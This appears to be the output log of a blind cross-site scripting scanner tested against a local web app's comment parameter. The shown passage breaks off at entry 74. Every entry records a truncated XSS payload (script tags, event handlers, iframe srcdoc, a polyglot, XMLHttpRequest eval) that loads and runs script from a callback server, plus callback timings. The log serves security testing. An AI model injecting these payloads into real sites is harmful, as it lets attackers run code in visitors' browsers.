================================================================================
BLIND XSS FINDINGS
================================================================================

[1] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><script src=http://127.0.0.1:5000/c/bfde3d95-c944-451e-a178-8f85da4ca2fc></scr...
    Injection Time: 2025-12-17T11:36:13.405871
    Callback Time: 2025-12-17T11:36:13.471527
    Delay: 0.07s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: bfde3d95-c944-451e-a178-8f85da4ca2fc

[2] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: javascript:eval('var a=document.createElement("script");a.src="http://127.0.0.1:...
    Injection Time: 2025-12-17T11:36:13.474592
    Callback Time: 2025-12-17T11:36:13.481214
    Delay: 0.01s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: d50429c6-6cd7-473e-b220-a9f80e8eb7f1

[3] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <svg onload="javascript:eval('var a=document.createElement("script");a.src="http...
    Injection Time: 2025-12-17T11:36:13.481559
    Callback Time: 2025-12-17T11:36:13.490087
    Delay: 0.01s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 2727057b-7a7c-4489-80fa-c3515a6ce885

[4] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <iframe src="javascript:var a=document.createElement('script');a.src='http://127...
    Injection Time: 2025-12-17T11:36:13.490653
    Callback Time: 2025-12-17T11:36:13.498043
    Delay: 0.01s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: c4e71fa6-0836-4a1d-871e-22a20c2a026f

[5] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><script src=http://127.0.0.1:5000/c/bfde3d95-c944-451e-a178-8f85da4ca2fc></scr...
    Injection Time: 2025-12-17T11:36:13.405871
    Callback Time: 2025-12-17T11:36:13.499281
    Delay: 0.09s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: bfde3d95-c944-451e-a178-8f85da4ca2fc

[6] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <body onload="var a=document.createElement('script');a.src='http://127.0.0.1:500...
    Injection Time: 2025-12-17T11:36:13.495789
    Callback Time: 2025-12-17T11:36:13.505422
    Delay: 0.01s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: de87c730-97dc-49ab-bb14-33a05bd04183

[7] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: javascript:eval('var a=document.createElement("script");a.src="http://127.0.0.1:...
    Injection Time: 2025-12-17T11:36:13.474592
    Callback Time: 2025-12-17T11:36:13.507251
    Delay: 0.03s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: d50429c6-6cd7-473e-b220-a9f80e8eb7f1

[8] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <script>$.getScript("//127.0.0.1:5000/c/4d7c90a2-2dec-41a5-878c-5c68897a29b5")</...
    Injection Time: 2025-12-17T11:36:13.504165
    Callback Time: 2025-12-17T11:36:13.509302
    Delay: 0.01s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 4d7c90a2-2dec-41a5-878c-5c68897a29b5

[9] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <script>function b(){{eval(this.responseText)}};a=new XMLHttpRequest();a.addEven...
    Injection Time: 2025-12-17T11:36:13.509358
    Callback Time: 2025-12-17T11:36:13.515635
    Delay: 0.01s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: cd86ee5f-debc-4e6d-ad66-636bf41e6a26

[10] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><script src=http://127.0.0.1:5000/c/bfde3d95-c944-451e-a178-8f85da4ca2fc></scr...
    Injection Time: 2025-12-17T11:36:13.405871
    Callback Time: 2025-12-17T11:36:13.519995
    Delay: 0.11s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: bfde3d95-c944-451e-a178-8f85da4ca2fc

[11] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <svg onload="javascript:eval('var a=document.createElement("script");a.src="http...
    Injection Time: 2025-12-17T11:36:13.481559
    Callback Time: 2025-12-17T11:36:13.524677
    Delay: 0.04s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 2727057b-7a7c-4489-80fa-c3515a6ce885

[12] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <script>fetch("//127.0.0.1:5000/c/1f10de8f-2332-40ad-ada7-43d9f51be620").then(r=...
    Injection Time: 2025-12-17T11:36:13.518787
    Callback Time: 2025-12-17T11:36:13.526514
    Delay: 0.01s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 1f10de8f-2332-40ad-ada7-43d9f51be620

[13] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: var a=document.createElement("script");a.src="http://127.0.0.1:5000/c/8c1ec391-e...
    Injection Time: 2025-12-17T11:36:13.524876
    Callback Time: 2025-12-17T11:36:13.532406
    Delay: 0.01s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 8c1ec391-e876-4ee4-9bb8-d78f5ee03708

[14] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: javascript:eval('var a=document.createElement("script");a.src="http://127.0.0.1:...
    Injection Time: 2025-12-17T11:36:13.474592
    Callback Time: 2025-12-17T11:36:13.534807
    Delay: 0.06s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: d50429c6-6cd7-473e-b220-a9f80e8eb7f1

[15] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <iframe src="javascript:var a=document.createElement('script');a.src='http://127...
    Injection Time: 2025-12-17T11:36:13.490653
    Callback Time: 2025-12-17T11:36:13.546087
    Delay: 0.06s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: c4e71fa6-0836-4a1d-871e-22a20c2a026f

[16] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <svg onload="javascript:eval('var a=document.createElement("script");a.src="http...
    Injection Time: 2025-12-17T11:36:13.481559
    Callback Time: 2025-12-17T11:36:13.555573
    Delay: 0.07s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 2727057b-7a7c-4489-80fa-c3515a6ce885

[17] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <body onload="var a=document.createElement('script');a.src='http://127.0.0.1:500...
    Injection Time: 2025-12-17T11:36:13.495789
    Callback Time: 2025-12-17T11:36:13.566476
    Delay: 0.07s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: de87c730-97dc-49ab-bb14-33a05bd04183

[18] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <div onmouseover="var a=document.createElement('script');a.src='http://127.0.0.1...
    Injection Time: 2025-12-17T11:36:13.559185
    Callback Time: 2025-12-17T11:36:13.567123
    Delay: 0.01s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: ce557d78-e04d-4c32-94ed-91e9bd2a6a6d

[19] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <audio src="x" onerror="var a=document.createElement('script');a.src='http://127...
    Injection Time: 2025-12-17T11:36:13.570076
    Callback Time: 2025-12-17T11:36:13.576360
    Delay: 0.01s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 12a0ec9f-afaa-4d68-9621-c66e432f8f1a

[20] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <script>$.getScript("//127.0.0.1:5000/c/4d7c90a2-2dec-41a5-878c-5c68897a29b5")</...
    Injection Time: 2025-12-17T11:36:13.504165
    Callback Time: 2025-12-17T11:36:13.578588
    Delay: 0.07s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 4d7c90a2-2dec-41a5-878c-5c68897a29b5

[21] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe...
    Injection Time: 2025-12-17T11:36:13.574268
    Callback Time: 2025-12-17T11:36:13.581190
    Delay: 0.01s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 81fb0eaf-bf1f-4d90-9b95-34cfcae1ac47

[22] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <script>function b(){{eval(this.responseText)}};a=new XMLHttpRequest();a.addEven...
    Injection Time: 2025-12-17T11:36:13.509358
    Callback Time: 2025-12-17T11:36:13.586550
    Delay: 0.08s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: cd86ee5f-debc-4e6d-ad66-636bf41e6a26

[23] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <iframe src="javascript:var a=document.createElement('script');a.src='http://127...
    Injection Time: 2025-12-17T11:36:13.490653
    Callback Time: 2025-12-17T11:36:13.591954
    Delay: 0.10s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: c4e71fa6-0836-4a1d-871e-22a20c2a026f

[24] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><svg onload=fetch("http://127.0.0.1:5000/c/0abf3e95-8f80-45d6-802c-47c50828501...
    Injection Time: 2025-12-17T11:36:13.583534
    Callback Time: 2025-12-17T11:36:13.593186
    Delay: 0.01s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 0abf3e95-8f80-45d6-802c-47c508285014

[25] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><iframe srcdoc="<script>fetch('http://127.0.0.1:5000/c/3cac3f9c-76a1-4023-940f...
    Injection Time: 2025-12-17T11:36:13.590809
    Callback Time: 2025-12-17T11:36:13.597079
    Delay: 0.01s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 3cac3f9c-76a1-4023-940f-e9e1c28b211c

[26] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><script src=http://127.0.0.1:5000/c/bfde3d95-c944-451e-a178-8f85da4ca2fc></scr...
    Injection Time: 2025-12-17T11:36:13.405871
    Callback Time: 2025-12-17T11:36:13.599697
    Delay: 0.19s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: bfde3d95-c944-451e-a178-8f85da4ca2fc

[27] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <script>fetch("//127.0.0.1:5000/c/1f10de8f-2332-40ad-ada7-43d9f51be620").then(r=...
    Injection Time: 2025-12-17T11:36:13.518787
    Callback Time: 2025-12-17T11:36:13.605313
    Delay: 0.09s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 1f10de8f-2332-40ad-ada7-43d9f51be620

[28] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <body onload="var a=document.createElement('script');a.src='http://127.0.0.1:500...
    Injection Time: 2025-12-17T11:36:13.495789
    Callback Time: 2025-12-17T11:36:13.608987
    Delay: 0.11s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: de87c730-97dc-49ab-bb14-33a05bd04183

[29] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: var a=document.createElement("script");a.src="http://127.0.0.1:5000/c/8c1ec391-e...
    Injection Time: 2025-12-17T11:36:13.524876
    Callback Time: 2025-12-17T11:36:13.614542
    Delay: 0.09s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 8c1ec391-e876-4ee4-9bb8-d78f5ee03708

[30] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: javascript:eval('var a=document.createElement("script");a.src="http://127.0.0.1:...
    Injection Time: 2025-12-17T11:36:13.474592
    Callback Time: 2025-12-17T11:36:13.618975
    Delay: 0.14s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: d50429c6-6cd7-473e-b220-a9f80e8eb7f1

[31] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <script>$.getScript("//127.0.0.1:5000/c/4d7c90a2-2dec-41a5-878c-5c68897a29b5")</...
    Injection Time: 2025-12-17T11:36:13.504165
    Callback Time: 2025-12-17T11:36:13.625900
    Delay: 0.12s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 4d7c90a2-2dec-41a5-878c-5c68897a29b5

[32] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <script>function b(){{eval(this.responseText)}};a=new XMLHttpRequest();a.addEven...
    Injection Time: 2025-12-17T11:36:13.509358
    Callback Time: 2025-12-17T11:36:13.630806
    Delay: 0.12s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: cd86ee5f-debc-4e6d-ad66-636bf41e6a26

[33] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><script src=http://127.0.0.1:5000/c/bfde3d95-c944-451e-a178-8f85da4ca2fc></scr...
    Injection Time: 2025-12-17T11:36:13.405871
    Callback Time: 2025-12-17T11:36:13.647239
    Delay: 0.24s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: bfde3d95-c944-451e-a178-8f85da4ca2fc

[34] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <svg onload="javascript:eval('var a=document.createElement("script");a.src="http...
    Injection Time: 2025-12-17T11:36:13.481559
    Callback Time: 2025-12-17T11:36:13.652133
    Delay: 0.17s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 2727057b-7a7c-4489-80fa-c3515a6ce885

[35] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <script>fetch("//127.0.0.1:5000/c/1f10de8f-2332-40ad-ada7-43d9f51be620").then(r=...
    Injection Time: 2025-12-17T11:36:13.518787
    Callback Time: 2025-12-17T11:36:13.656409
    Delay: 0.14s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 1f10de8f-2332-40ad-ada7-43d9f51be620

[36] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <div onmouseover="var a=document.createElement('script');a.src='http://127.0.0.1...
    Injection Time: 2025-12-17T11:36:13.559185
    Callback Time: 2025-12-17T11:36:13.661578
    Delay: 0.10s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: ce557d78-e04d-4c32-94ed-91e9bd2a6a6d

[37] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: var a=document.createElement("script");a.src="http://127.0.0.1:5000/c/8c1ec391-e...
    Injection Time: 2025-12-17T11:36:13.524876
    Callback Time: 2025-12-17T11:36:13.666514
    Delay: 0.14s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 8c1ec391-e876-4ee4-9bb8-d78f5ee03708

[38] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: javascript:eval('var a=document.createElement("script");a.src="http://127.0.0.1:...
    Injection Time: 2025-12-17T11:36:13.474592
    Callback Time: 2025-12-17T11:36:13.670049
    Delay: 0.20s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: d50429c6-6cd7-473e-b220-a9f80e8eb7f1

[39] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <audio src="x" onerror="var a=document.createElement('script');a.src='http://127...
    Injection Time: 2025-12-17T11:36:13.570076
    Callback Time: 2025-12-17T11:36:13.672469
    Delay: 0.10s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 12a0ec9f-afaa-4d68-9621-c66e432f8f1a

[40] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe...
    Injection Time: 2025-12-17T11:36:13.574268
    Callback Time: 2025-12-17T11:36:13.679053
    Delay: 0.10s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 81fb0eaf-bf1f-4d90-9b95-34cfcae1ac47

[41] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <iframe src="javascript:var a=document.createElement('script');a.src='http://127...
    Injection Time: 2025-12-17T11:36:13.490653
    Callback Time: 2025-12-17T11:36:13.687640
    Delay: 0.20s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: c4e71fa6-0836-4a1d-871e-22a20c2a026f

[42] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><svg onload=fetch("http://127.0.0.1:5000/c/0abf3e95-8f80-45d6-802c-47c50828501...
    Injection Time: 2025-12-17T11:36:13.583534
    Callback Time: 2025-12-17T11:36:13.691810
    Delay: 0.11s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 0abf3e95-8f80-45d6-802c-47c508285014

[43] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><iframe srcdoc="<script>fetch('http://127.0.0.1:5000/c/3cac3f9c-76a1-4023-940f...
    Injection Time: 2025-12-17T11:36:13.590809
    Callback Time: 2025-12-17T11:36:13.695462
    Delay: 0.10s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 3cac3f9c-76a1-4023-940f-e9e1c28b211c

[44] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <svg onload="javascript:eval('var a=document.createElement("script");a.src="http...
    Injection Time: 2025-12-17T11:36:13.481559
    Callback Time: 2025-12-17T11:36:13.704212
    Delay: 0.22s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 2727057b-7a7c-4489-80fa-c3515a6ce885

[45] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <body onload="var a=document.createElement('script');a.src='http://127.0.0.1:500...
    Injection Time: 2025-12-17T11:36:13.495789
    Callback Time: 2025-12-17T11:36:13.710254
    Delay: 0.21s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: de87c730-97dc-49ab-bb14-33a05bd04183

[46] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <div onmouseover="var a=document.createElement('script');a.src='http://127.0.0.1...
    Injection Time: 2025-12-17T11:36:13.559185
    Callback Time: 2025-12-17T11:36:13.713652
    Delay: 0.15s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: ce557d78-e04d-4c32-94ed-91e9bd2a6a6d

[47] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <audio src="x" onerror="var a=document.createElement('script');a.src='http://127...
    Injection Time: 2025-12-17T11:36:13.570076
    Callback Time: 2025-12-17T11:36:13.726149
    Delay: 0.16s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 12a0ec9f-afaa-4d68-9621-c66e432f8f1a

[48] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <script>$.getScript("//127.0.0.1:5000/c/4d7c90a2-2dec-41a5-878c-5c68897a29b5")</...
    Injection Time: 2025-12-17T11:36:13.504165
    Callback Time: 2025-12-17T11:36:13.730006
    Delay: 0.23s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 4d7c90a2-2dec-41a5-878c-5c68897a29b5

[49] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe...
    Injection Time: 2025-12-17T11:36:13.574268
    Callback Time: 2025-12-17T11:36:13.734291
    Delay: 0.16s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 81fb0eaf-bf1f-4d90-9b95-34cfcae1ac47

[50] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <script>function b(){{eval(this.responseText)}};a=new XMLHttpRequest();a.addEven...
    Injection Time: 2025-12-17T11:36:13.509358
    Callback Time: 2025-12-17T11:36:13.737753
    Delay: 0.23s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: cd86ee5f-debc-4e6d-ad66-636bf41e6a26

[51] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <iframe src="javascript:var a=document.createElement('script');a.src='http://127...
    Injection Time: 2025-12-17T11:36:13.490653
    Callback Time: 2025-12-17T11:36:13.741060
    Delay: 0.25s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: c4e71fa6-0836-4a1d-871e-22a20c2a026f

[52] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><svg onload=fetch("http://127.0.0.1:5000/c/0abf3e95-8f80-45d6-802c-47c50828501...
    Injection Time: 2025-12-17T11:36:13.583534
    Callback Time: 2025-12-17T11:36:13.744053
    Delay: 0.16s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 0abf3e95-8f80-45d6-802c-47c508285014

[53] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><iframe srcdoc="<script>fetch('http://127.0.0.1:5000/c/3cac3f9c-76a1-4023-940f...
    Injection Time: 2025-12-17T11:36:13.590809
    Callback Time: 2025-12-17T11:36:13.747992
    Delay: 0.16s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 3cac3f9c-76a1-4023-940f-e9e1c28b211c

[54] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><script src=http://127.0.0.1:5000/c/bfde3d95-c944-451e-a178-8f85da4ca2fc></scr...
    Injection Time: 2025-12-17T11:36:13.405871
    Callback Time: 2025-12-17T11:36:13.753658
    Delay: 0.35s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: bfde3d95-c944-451e-a178-8f85da4ca2fc

[55] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <script>fetch("//127.0.0.1:5000/c/1f10de8f-2332-40ad-ada7-43d9f51be620").then(r=...
    Injection Time: 2025-12-17T11:36:13.518787
    Callback Time: 2025-12-17T11:36:13.761261
    Delay: 0.24s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 1f10de8f-2332-40ad-ada7-43d9f51be620

[56] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <body onload="var a=document.createElement('script');a.src='http://127.0.0.1:500...
    Injection Time: 2025-12-17T11:36:13.495789
    Callback Time: 2025-12-17T11:36:13.765233
    Delay: 0.27s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: de87c730-97dc-49ab-bb14-33a05bd04183

[57] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: var a=document.createElement("script");a.src="http://127.0.0.1:5000/c/8c1ec391-e...
    Injection Time: 2025-12-17T11:36:13.524876
    Callback Time: 2025-12-17T11:36:13.772562
    Delay: 0.25s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 8c1ec391-e876-4ee4-9bb8-d78f5ee03708

[58] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: javascript:eval('var a=document.createElement("script");a.src="http://127.0.0.1:...
    Injection Time: 2025-12-17T11:36:13.474592
    Callback Time: 2025-12-17T11:36:13.777215
    Delay: 0.30s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: d50429c6-6cd7-473e-b220-a9f80e8eb7f1

[59] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <svg onload="javascript:eval('var a=document.createElement("script");a.src="http...
    Injection Time: 2025-12-17T11:36:13.481559
    Callback Time: 2025-12-17T11:36:13.812283
    Delay: 0.33s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 2727057b-7a7c-4489-80fa-c3515a6ce885

[60] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <div onmouseover="var a=document.createElement('script');a.src='http://127.0.0.1...
    Injection Time: 2025-12-17T11:36:13.559185
    Callback Time: 2025-12-17T11:36:13.825504
    Delay: 0.27s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: ce557d78-e04d-4c32-94ed-91e9bd2a6a6d

[61] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: var a=document.createElement("script");a.src="http://127.0.0.1:5000/c/8c1ec391-e...
    Injection Time: 2025-12-17T11:36:13.524876
    Callback Time: 2025-12-17T11:36:13.828326
    Delay: 0.30s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 8c1ec391-e876-4ee4-9bb8-d78f5ee03708

[62] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <audio src="x" onerror="var a=document.createElement('script');a.src='http://127...
    Injection Time: 2025-12-17T11:36:13.570076
    Callback Time: 2025-12-17T11:36:13.837686
    Delay: 0.27s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 12a0ec9f-afaa-4d68-9621-c66e432f8f1a

[63] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe...
    Injection Time: 2025-12-17T11:36:13.574268
    Callback Time: 2025-12-17T11:36:13.841133
    Delay: 0.27s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 81fb0eaf-bf1f-4d90-9b95-34cfcae1ac47

[64] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <iframe src="javascript:var a=document.createElement('script');a.src='http://127...
    Injection Time: 2025-12-17T11:36:13.490653
    Callback Time: 2025-12-17T11:36:13.843757
    Delay: 0.35s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: c4e71fa6-0836-4a1d-871e-22a20c2a026f

[65] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><svg onload=fetch("http://127.0.0.1:5000/c/0abf3e95-8f80-45d6-802c-47c50828501...
    Injection Time: 2025-12-17T11:36:13.583534
    Callback Time: 2025-12-17T11:36:13.849186
    Delay: 0.27s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 0abf3e95-8f80-45d6-802c-47c508285014

[66] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><iframe srcdoc="<script>fetch('http://127.0.0.1:5000/c/3cac3f9c-76a1-4023-940f...
    Injection Time: 2025-12-17T11:36:13.590809
    Callback Time: 2025-12-17T11:36:13.854005
    Delay: 0.26s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 3cac3f9c-76a1-4023-940f-e9e1c28b211c

[67] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <body onload="var a=document.createElement('script');a.src='http://127.0.0.1:500...
    Injection Time: 2025-12-17T11:36:13.495789
    Callback Time: 2025-12-17T11:36:13.860652
    Delay: 0.36s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: de87c730-97dc-49ab-bb14-33a05bd04183

[68] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <div onmouseover="var a=document.createElement('script');a.src='http://127.0.0.1...
    Injection Time: 2025-12-17T11:36:13.559185
    Callback Time: 2025-12-17T11:36:13.865033
    Delay: 0.31s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: ce557d78-e04d-4c32-94ed-91e9bd2a6a6d

[69] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <audio src="x" onerror="var a=document.createElement('script');a.src='http://127...
    Injection Time: 2025-12-17T11:36:13.570076
    Callback Time: 2025-12-17T11:36:13.876177
    Delay: 0.31s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 12a0ec9f-afaa-4d68-9621-c66e432f8f1a

[70] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><svg onload=fetch("http://127.0.0.1:5000/c/0abf3e95-8f80-45d6-802c-47c50828501...
    Injection Time: 2025-12-17T11:36:13.583534
    Callback Time: 2025-12-17T11:36:13.888181
    Delay: 0.30s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 0abf3e95-8f80-45d6-802c-47c508285014

[71] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><iframe srcdoc="<script>fetch('http://127.0.0.1:5000/c/3cac3f9c-76a1-4023-940f...
    Injection Time: 2025-12-17T11:36:13.590809
    Callback Time: 2025-12-17T11:36:13.891751
    Delay: 0.30s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 3cac3f9c-76a1-4023-940f-e9e1c28b211c

[72] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: var a=document.createElement("script");a.src="http://127.0.0.1:5000/c/8c1ec391-e...
    Injection Time: 2025-12-17T11:36:13.524876
    Callback Time: 2025-12-17T11:36:13.906953
    Delay: 0.38s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 8c1ec391-e876-4ee4-9bb8-d78f5ee03708

[73] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <div onmouseover="var a=document.createElement('script');a.src='http://127.0.0.1...
    Injection Time: 2025-12-17T11:36:13.559185
    Callback Time: 2025-12-17T11:36:13.923343
    Delay: 0.36s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: ce557d78-e04d-4c32-94ed-91e9bd2a6a6d

[74] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: <audio src="x" onerror="var a=document.createElement('script');a.src='http://127...
    Injection Time: 2025-12-17T11:36:13.570076
    Callback Time: 2025-12-17T11:36:13.931555
    Delay: 0.36s
    Source IP: 127.0.0.1
